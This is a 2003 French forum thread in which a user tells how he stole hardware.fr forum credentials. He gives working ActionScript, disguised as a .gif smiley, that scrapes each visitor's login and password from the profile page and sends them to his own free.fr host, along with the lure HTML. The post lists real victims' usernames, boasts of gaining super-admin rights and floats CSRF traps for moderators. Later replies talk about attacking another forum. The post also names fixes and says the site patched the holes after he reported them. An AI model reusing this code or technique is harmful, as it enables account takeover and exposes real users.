La faille des forums presence pc enfin dévoilée!

La faille des forums presence pc enfin dévoilée! - PHP - Programmation

Marsh Posté le 25-11-2003 à 22:46:28    

je précise avant tout :
ce post est à carractère informatif, je dégage toute responsabilité dans le cas d'une utilisation méchante de ces infos :D

 
 
yo les moules :o  
 
 
bon je vais vous expliquer comment j'ai reussi à hacker le forum.. je sais, ça fait longtemps que vous attendez.. j'ai eu pleins de mp et tout.. bref..
 
vous allez voir, c'est tout bidon.
 
Bon tout a commencé en observant le code source html du forum..
 
hop je vous montre ce qui m'a un peu choqué :
 

<tr bgcolor="#C9DBED">  
   <td valign="top" width="1%"><b class="text2big">Nom d'utilisateur</b></td>
   <td valign="top">  
     <input maxlength="25" accesskey="p" size="25" name="pseudo" value="Mr yvele" />&nbsp;&nbsp; <a href="inscription.php3?interface=&amp;config=" class="text2small">Pour poster, vous devez être inscrit sur ce forum .... si ce n'est pas le cas, cliquez ici !</a>
   </td>
 </tr>
 <tr bgcolor="#C9DBED" style="display: none" id="passf">  
  <td valign="top"><b class="text2big">Mot de passe :</b></td>
  <td valign="top">  
  <input type="password" maxlength="40" size="25" name="password" value="monpitipassword" />&nbsp;&nbsp; <a href="password.php3?interface=&amp;config=" class="text2small"><b>Vous avez perdu votre mot de passe ? Cliquez ici !</b></a>
  </td>
</tr>


 
oui, vous n'avez pas rêvé :
 
name="password" value="monpitipassword"
name="pseudo" value="Mr yvele"  
 
votre login et votre mot de passes étaient visibles dans le code source de la page [:mcwimpy4]  
donc n'importe quel gugus qui ouvre une page du forum avec les cookies d'un autre, peu connaitre son mot de passe sans problemes.. bref..
 
maintenant le but, c'est que je puisse connaitre le mot de passe du gars sans avoir besoin de me glisser devant son pc pendant qu'il va pisser un bol :o  
 
 
bref.. j'me suis dit comme ça que je pourrais, via une page hebergée chez moi, inclure la page profil de hrf, qui contient le mot de passe, dans une iframe.. puis, via un javascript (je crois.. je sais plus trop), recuperer le code source de cette fameuse iframe
Puis, enfin, l'envoyer via GET, vers une page php qui s'occuperait de stocker le bazard..
 
exemple :
 
Dans ma page hebergée par free:

<iframe src="http://forum.hardware.fr/profile.php3?config=&interface=">
</iframe>


 
mais bon, j'avais pas pensé à un truc, c'est que le cookie de hfr ne marche pas, vu qu'il est appellé indirectement pas une page située autre part que sur http://forum.hardware.fr et c'est la page mère qui compte pour l'ouverture du cookie.
 
 
conclusion :
il est impossible de lire la valeur d'un cookie depuis un site web si ce cookie a été placé depuis un autre site web. meme pas par appel indirecte..
(le web c'est de la qualitay! c'est bien fait quand meme! :D )
 
 
 
bref.. donc, il faut que le script éxécuté par la cible, soit télechargé à partir de http://forum.hardware.fr..
donc uploader chez hfr, un michant fichier..
 
et quel moyen permet d'uploader des fichiers sur leur serveur?
- les avatars
- les smileys perso
 
les avatars requierent une validation du modo.. donc ça pourrait pas marcher..
par contre le smiley perso, on pouvait faire comme on voulait.. :p  
 
donc j'ai fait un petit fichier swf (oui, flash :o )
avec ceci codé en actionscript :
 

Code :
  1. //chargement des variables
  2. phpvars = new LoadVars();
  3. phpvars.load("http://forum.hardware.fr/profile.php3?config=&interface=" );
  4. phpvars.onLoad = function()
  5. {
  6. if(getBytesLoaded >= getBytesTotal)
  7. {
  8.   str = phpvars.toString();
  9.  
  10.   debut = str.indexOf("value%3D%22",0)+11;
  11.   fin  = str.indexOf("%22%3E%0A",debut+1);
  12.   l  = str.slice(debut,fin);
  13.  
  14.   debut = str.indexOf("value%3D%22",fin)+10;
  15.   fin  = str.indexOf("%22%3E%0A",debut+1);
  16.   p  = str.slice(debut,fin);
  17.   tophp = new LoadVars();
  18.   tophp.a = l;
  19.   tophp.b = p;
  20.  
  21.   tophp.send("http://truc.free.fr/page.php" );
  22.   }
  23. }


 
bon, ça se passe de commentaires.. :o  
on récupère le contenu de http://forum.hardware.fr/profile.php3, on cherche les trucs qui nous interresse et on envoie tout via POST ou GET, vers un page php.. qui s'occupe de tout stocker! :o
 
bon cool ça marche!
j'essaye d'uploader le .swf.. ça passe pas :o  
je renome le .swf en .gif .... ça passe! :D  
 
voila.. il suffit plus que de faire une vieille page html qui pointe vers mon fichier flash camouflé! ;)  
 
hop :
 

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width=80 height=50><param name=movie value=http://forum.hardware.fr/images/Mr%20yvele.gif>
<param name=quality value=high>
<param name=bgcolor value=#FFFFFF>
</object>


 
maintenant j'utilise mon multi (le smiley perso à été uploadé chez lui bien sur, histoire qu'on sache pas que c'est moi)
je crée des topics bidon rameuteur de troupe chez mes copains de graphisme et programmation puis discussion aussi hein :D  
 
j'y poste mon liens, qui lui pointe vers le swf caché, qui lui meme pointe vers la page de profil et la page de sauvegarde  :sol:  
 
hop j'attend 10-15 min..
ouèèèè plein de blaireaux tombent dans le piège à loup
 
hop pou rle fun, la liste :
 


login: parappa
login: fondbleu  
login: nepheast  
login: Mr%20yvele  
login: Enzan  
login: moazaaa  
login: mattc  
login: pulpipi  
login: Miguelito%20Loveless  
login: darth21  
login: dago  
login: HFrBaXtER  
login: mareek  
login: atigrou  
login: Maraude  
login: kewuy  
login: Meganne  
login: pangolator  
login: The%20Beast  
 
login: rarules  
login: uriel  
login: uriel  
login: Burgergold  
login: uriel  
login: XP1700
[g]login: marc[/g]
login: mrbebert  
login: Autobot  
 
login: Autobot  
login: denis1  
login: simogeo  
login: Space  
login: DesuetCR%5FB  
login: suri  


 
yeah comme vous pouvez le voir, j'aivais le mot de passe de marc..
donc la possibilité de tout faire sur le forum..
y compris mettre "Mr yvele" en super admin! :sol:  
 
voici les screens :
http://iicrew.free.fr/hack%20hfr/
 
y a de tout.. [:sinclaire]  
 
voila..
 
 
 
donc 3 grandes failles béantes :
 
1) présence du password login dans la source html
2) mauvaise vérification du fichier image uploadé (utiliser exif_imagetype() en php)
3) smiley perso non controllé par les modos
 
 
 
Encore un truc à signaler.. à propos des urls foireuse..
genre poser une url cachée sur un topic, qui pointe vers une page du forum qui, par exemple efface tout les drapos, ou, met des gens en ignore list
 
exemple :
http://www.google.fr/
 
donc la, joce n'a rien fait pour parer ce tour de passe passe.. mais il y a des solutions (que j'ai soumis à joce, mais il veut rien entendre.. [:mmmfff])
genre genérer un muméro unique pour chaque forumeur, et le demander dans toutes ses urls (enfin juste les urls à rique, pas les viewtopic et compagnie)
 
du coup l'url pointant vers
http://forum.hardware.fr/suppressf [...] rid=564231
 
ne sera applicable que pour le forumeur ayant l'id 564231..
 
 
solution facile à mettre en place, pour eviter les pieges url de masse! [:sinclaire]  
 
(et puis je signale que j'ai toutes les urls de d'administration du forum.. et je pourrais donc les cacher en attendant qu'un modérateur maladroit clique dessus, puis effectue une action non souhaitée! [:power666] )
 
 
lol bon..
alors voila.. je vous avez dit que c'était tout bidon!  :)


---------------
yvele n'est plus.
Reply

Marsh Posté le 25-11-2003 à 22:46:28   

Reply

Marsh Posté le 25-11-2003 à 22:46:41    

voila.. [:cupra]
 
c'est la que je me suis autodésigné comme super administrateur :
 
http://iicrew.free.fr/hack%20hfr/admin3.png
 
 :D
 
 
edit: et en plus HFR 6eme plus grand forum mondial!  [:extazaille]


Message édité par Mr yvele le 28-12-2003 à 21:21:30

---------------
yvele n'est plus.
Reply

Marsh Posté le 25-11-2003 à 22:48:38    

C'est tout ? c'est nul !


Message édité par icewinddale le 25-11-2003 à 22:48:47
Reply

Marsh Posté le 25-11-2003 à 22:52:09    

quel w4rl0rd

Reply

Marsh Posté le 25-11-2003 à 22:52:34    

roh le fou, ça donne des idées pour améliorer la sécu de mon futur forum ça :D
 
je t'engagerai comme betatesteur le moment venu :ange:


---------------
Whichever format the fan may want to listen is fine with us – vinyl, wax cylinders, shellac, 8-track, iPod, cloud storage, cranial implants – just as long as it’s loud and rockin' (Billy Gibbons, ZZ Top)
Reply

Marsh Posté le 25-11-2003 à 22:52:35    

j'ai hésité à le mettre dans html :o


---------------
yvele n'est plus.
Reply

Marsh Posté le 25-11-2003 à 22:53:32    

c'est pas mal :jap:


---------------
Music|Market|Feed|Loom|DVD
Reply

Marsh Posté le 25-11-2003 à 22:54:30    

[:romf]  [:zytra]


---------------
RTCW & W:ET PlayerDawa Pack 1.28ハイテクなマスター
Reply

Marsh Posté le 25-11-2003 à 22:55:42    

Bien joué le coup du swf :)

Reply

Marsh Posté le 25-11-2003 à 22:57:08    

j'ai pas compris à quoi servait la page html ou le faux smiley
(un, oui, mais pas les deux)
et je suis surpris que flash gere les cookies du browser!?


---------------
Hey toi, tu veux acheter des minifigurines Lego, non ?
Reply

Marsh Posté le 25-11-2003 à 22:57:08   

Reply

Marsh Posté le 25-11-2003 à 22:57:21    

putain on pourra plus se foutre de son actionscript a la con [:sisicaivrai]

Reply

Marsh Posté le 25-11-2003 à 22:57:57    

ben faut bien que le faux smiley soit exécuté par flash.. faut bien l'appeller..  [:sinclaire]
 
si il est pas exécuté par un client (forumeur), il fait rien hein..


Message édité par Mr yvele le 25-11-2003 à 22:58:40

---------------
yvele n'est plus.
Reply

Marsh Posté le 25-11-2003 à 22:58:38    

haaaa oook j'y suis..


---------------
Hey toi, tu veux acheter des minifigurines Lego, non ?
Reply

Marsh Posté le 25-11-2003 à 22:58:50    

en fait je me rends compte que j'ai pas tout compris [:meganne]


---------------
Music|Market|Feed|Loom|DVD
Reply

Marsh Posté le 25-11-2003 à 22:59:30    

quoi? [:meganne]


---------------
yvele n'est plus.
Reply

Marsh Posté le 25-11-2003 à 22:59:39    

Reply

Marsh Posté le 25-11-2003 à 23:00:05    

the real moins moins a écrit :


et je suis surpris que flash gere les cookies du browser!?


---------------
Hey toi, tu veux acheter des minifigurines Lego, non ?
Reply

Marsh Posté le 25-11-2003 à 23:00:15    

impressionant javoue

Reply

Marsh Posté le 25-11-2003 à 23:01:13    

ça va donner de mauvaises idées... pleins de forumphpbb proposent d'uploader du flash sur le serveur.. :/
 
au lieu de recuperer le source, on pourrait attaquer directement le cookie.. bref.. jsuis trop paresseux pour essayer :o
 
 
edit: en tout cas faut faire circuler l'info rapidement apres des webmaster de forum [:sinclaire]


Message édité par Mr yvele le 25-11-2003 à 23:02:01

---------------
yvele n'est plus.
Reply

Marsh Posté le 25-11-2003 à 23:02:00    

Mr yvele a écrit :

ben faut bien que le faux smiley soit exécuté par flash.. faut bien l'appeller..  [:sinclaire]
 
si il est pas exécuté par un client (forumeur), il fait rien hein..


Donc si je comprend bien ton .swf était en fait un .gif, que le forum met dans un tag <img>. Ce qui signifie donc que certains browsers appellent le plugin Flash à partir d'un tag <img> ???


---------------
Incongru : une FAQ abandonnée sur les Standards du Web - FAQ périmée de blabla@Prog
Reply

Marsh Posté le 25-11-2003 à 23:02:34    

[:cupra]


---------------
Can't buy what I want because it's free -
Reply

Marsh Posté le 25-11-2003 à 23:03:43    

ben y'a des étapes que j'ai pas compris en fait...
une petite récap rapide étape par étape ? [:cupra]


---------------
Music|Market|Feed|Loom|DVD
Reply

Marsh Posté le 25-11-2003 à 23:03:49    

gm_superstar a écrit :


Donc si je comprend bien ton .swf était en fait un .gif, que le forum met dans un tag <img>. Ce qui signifie donc que certains browsers appellent le plugin Flash à partir d'un tag <img> ???


 
nan c'est le contraire.. c'est un flash renomé en .swf..
 
apres j'ai une page perso comme ça :

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width=80 height=50>
<param name=movie value=http://forum.hardware.fr/images/Mr%20yvele.gif>
<param name=quality value=high>
<param name=bgcolor value=#FFFFFF>
</object>


 
qui, une fois appellée par le forumeur cible, lance mon faux smiley avec marcomdei flash player :)
 
 
regarde la :
<param name=movie value=http://forum.hardware.fr/images/Mr%20yvele.gif>
 


Message édité par Mr yvele le 25-11-2003 à 23:05:27

---------------
yvele n'est plus.
Reply

Marsh Posté le 25-11-2003 à 23:06:02    

[:wam]


---------------
www.novemberguitars.com
Reply

Marsh Posté le 25-11-2003 à 23:07:54    

bon maintenant faut s'amuser a trouver d'autre faille sur le forum de joce :evil:


Message édité par forummp3 le 25-11-2003 à 23:08:06

---------------
lecteur mp3 yvele's smilies jeux de fille
Reply

Marsh Posté le 25-11-2003 à 23:09:43    

forummp3 a écrit :

bon maintenant faut s'amuser a trouver d'autre faille sur le forum de joce :evil:


on pourrait essayer sur ton forum :o


---------------
Whichever format the fan may want to listen is fine with us – vinyl, wax cylinders, shellac, 8-track, iPod, cloud storage, cranial implants – just as long as it’s loud and rockin' (Billy Gibbons, ZZ Top)
Reply

Marsh Posté le 25-11-2003 à 23:09:54    

Loom the gloom a écrit :

ben y'a des étapes que j'ai pas compris en fait...
une petite récap rapide étape par étape ? [:cupra]


 
okay...
 
 
en fait j'ai fait :
 
1 fichier flash renomé en .gif> que j'ai placé sur le serveur de hfr.. (via l'upload de smiley)
 
1 page html> qui demande à flash player d'ouvrir le fichier flash renomé en .gif, qui se trouve sur le serveur de hfr
 
1 page php> qui recupère le mot de passe et login envoyé par le fichier flash
 
 
 
1 page html> appelle 1 fichier flash renomé en .gif> qui lui, appelle 1 page php>


---------------
yvele n'est plus.
Reply

Marsh Posté le 25-11-2003 à 23:10:42    

Mr yvele a écrit :

qui, une fois appellée par le forumeur cible, lance mon faux smiley avec marcomdei flash player :)
 
 
regarde la :
<param name=movie value=http://forum.hardware.fr/images/Mr%20yvele.gif>


Ah ouais OK. C'est en fait le plugin Flash qui est pourryte et qui ne vérifie pas l'extension et/ou le type MIME du fichier en paramètre.
 
Bien joué :jap:
 
Edit: enfin le plugin Flash est pourryte mais c'est surtout le forum  qui a (eu) des problèmes :o


Message édité par gm_superstar le 25-11-2003 à 23:11:53

---------------
Incongru : une FAQ abandonnée sur les Standards du Web - FAQ périmée de blabla@Prog
Reply

Marsh Posté le 25-11-2003 à 23:11:42    

ok, c'est mieux, je ne saisis juste pas le lien entre le fichier gif et les mots de passe et login...


---------------
Music|Market|Feed|Loom|DVD
Reply

Marsh Posté le 25-11-2003 à 23:11:45    

drasche a écrit :


on pourrait essayer sur ton forum :o

oui oui, j'attend :evil:
 
1er défi: pouvoir acceder à la cat 0 :o


---------------
lecteur mp3 yvele's smilies jeux de fille
Reply

Marsh Posté le 25-11-2003 à 23:12:58    

Loom the gloom a écrit :

ok, c'est mieux, je ne saisis juste pas le lien entre le fichier gif et les mots de passe et login...


Comme tu l'as dit, actionscript permet d'accéder aux cookies à partir du moment où le script provient du même domaine que les cookies [:spamafote]
 
Ah non j'ai rien dit il parse la page du profil


Message édité par gm_superstar le 25-11-2003 à 23:15:42

---------------
Incongru : une FAQ abandonnée sur les Standards du Web - FAQ périmée de blabla@Prog
Reply

Marsh Posté le 25-11-2003 à 23:13:28    

pourquoi les screens datent de juin ?


---------------
www.novemberguitars.com
Reply

Marsh Posté le 25-11-2003 à 23:13:41    

j'ai rien compris à tout ce merdier web à la con mais bravo


---------------
J'ai un string dans l'array (Paris Hilton)
Reply

Marsh Posté le 25-11-2003 à 23:13:44    

forummp3 a écrit :

oui oui, j'attend :evil:


 
tu permets pas l'uload! alors forcement tu te mouilles pas trop  :o  
 
 
essayez de hacker mes fichiers html :o  :o  
 
 :D


---------------
yvele n'est plus.
Reply

Marsh Posté le 25-11-2003 à 23:14:10    

MossieurPropre a écrit :

pourquoi les screens datent de juin ?


 
parce que ça date de juin  :D


---------------
yvele n'est plus.
Reply

Marsh Posté le 25-11-2003 à 23:14:54    

En tout cas c'est vieux, la faille a été corrigée depuis non ? Parce que je viens de vérifier, mon mdp est encodé dans le profile.php3.

Reply

Marsh Posté le 25-11-2003 à 23:16:32    

http://forum.forum-mp3.net/list.php?cat=1-1
j'y suis presque ya ecrit "forum admin modo" a gauche :D

Reply

Marsh Posté le 25-11-2003 à 23:16:33    

oui bien sur, en fait j'ai prevenu joce (le créateur du forum) tout de suite apres le hack...
 
il a réparé toutes ces failles.. et m'a demandé de ne rien dire à personne..
mais bon, la c'est abusé, ça va faire bientot 6 mois..  [:sinclaire]  
 
 
faut que le peuple sache tout! :o


---------------
yvele n'est plus.
Reply

Marsh Posté le 25-11-2003 à 23:17:31    

orazur a écrit :

http://forum.forum-mp3.net/list.php?cat=1-1
j'y suis presque ya ecrit "forum admin modo" a gauche :D


 
forummp3> [:forummp3]


---------------
yvele n'est plus.
Reply

Marsh Posté le 25-11-2003 à 23:18:15    

orazur a écrit :

http://forum.forum-mp3.net/list.php?cat=1-1
j'y suis presque ya ecrit "forum admin modo" a gauche :D


 
ca c'est du hack de haut vol [:le kneu]

Reply

Marsh Posté le    

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed